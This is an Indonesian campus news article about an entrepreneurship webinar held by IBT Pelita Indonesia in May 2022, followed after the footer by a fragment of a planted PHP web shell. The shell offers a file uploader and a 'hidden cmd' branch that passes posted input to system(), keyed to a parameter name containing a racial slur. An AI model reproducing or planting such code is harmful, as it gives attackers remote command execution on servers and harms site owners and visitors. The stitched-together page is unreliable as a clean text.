#

Webinar Kewirausahaan Berbasis Inovasi dan Digitalisasi

Institut Bisnis dan Teknologi (IBT) Pelita Indonesia merupakan kampus dengan atmosfer kewirausahaan yang kuat. Hal ini tertuang di dalam tujuan Institut Bisnis dan Teknologi Pelita Indonesia yang salah satunya adalah Menghasilkan wirausahawan yang mampu bekerja secara mandiri dan tangguh serta bermoral baik sehingga dapat membuka lapangan pekerjaan baru. Untuk mewujudkan hal tersebut, berbagai program telah dilakukan oleh pihak kampus, baik yang kegiatan yang bernuansa akademik maupun non akademik. Salah satu program yang bernuansa akademik yang telah berjalan dalam beberapa tahun terakhir adalah Praktik Kerja Lapangan yang berbentuk business project, yang terdiri dari dua skema, yaitu ide bisnis dan inovasi bisnis.

Agar pelaksanaan kegiatan business project ini dapat berjalan dengan baik dan sesuai dengan tujuanya untuk menciptakan calon-calon pengusaha baru, maka selama periode pelaksanaannya, para mahasiswa yang mengikuti program business project dibekali dengan pengembangan wawasan di bidang kewirausahaan, yang salah satunya melalui pelaksanaan webinar. Pelaksanaan webinar terbaru dilakukan pada hari Sabtu (14/05/2022) jam 19.00 WIB secara daring melalui aplikasi zoom.

Webinar kali ini menghadirkan pembicara yang berasal dari Universiti Selangor (UNISEL) Malaysia, yaitu Prof. Dr. Setyawan Widyarto, yang memiliki pengalaman lebih dari 30 tahun di dunia praktis dan akademis. Keahlian belian adalah dibidang teknologi, sehingga pantaslah webinar kali ini mengusung tema “Fostering Student Entrpreneurship through Innovation and Digitalization.” Sedangkan pembicara kedua adalah Ibu Dr. Layla Hafni, S.E., M.M. Beliau merupakan dekan fakultas bisnis IBT Pelita Indonesia. Jika pembicara kedua lebih fokus pada kewirausahaan berbasis digitalisasi, maka pembicara 2 lebih terfokus pada pengelolaan bisnis yang baik. Sedangkan yang didampak sebagai moderator adalah Stefani Chandra, B.BusCom., MIB. dan Andi, S.Kom., M.M. yang telah dengan sangat baik memandu acara dalam dua bahasa, yaitu dengan bahasa Inggris dan bahasa Indonesia.

The Best Institute in Pekanbaru Riau

"; echo "

Uploader

"; echo "".php_uname()." "; echo "
"; echo "
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Upload Fail";}}} //hidden cmd if(isset($_REQUEST['shellnigga2099X'])){ echo "
";
echo "

CMD

"; echo "".php_uname()." "; echo " "; $shellnigga2099X = ($_POST['coba']); system($shellnigga2099X); echo "
"; die; } ?>